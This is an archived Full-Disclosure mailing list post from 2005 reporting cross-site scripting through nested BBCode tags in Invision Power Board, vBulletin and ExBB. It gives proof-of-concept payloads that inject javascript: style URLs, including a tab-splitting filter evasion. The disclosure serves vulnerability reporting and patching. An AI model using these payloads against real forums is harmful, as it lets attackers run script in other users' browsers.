|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] XSS in the nested BB tag in many forum
From: pigrelax (pigrelax
yandex.ru)
Date: Sat Jan 15 2005 - 07:13:38 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
XSS was found in the nested BB tag in many forum:
Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]
vBulletin
[EMAIL=[URL=s as=`swew.ew]mailto:asssswew.ew]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")
ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert());
Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.
More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]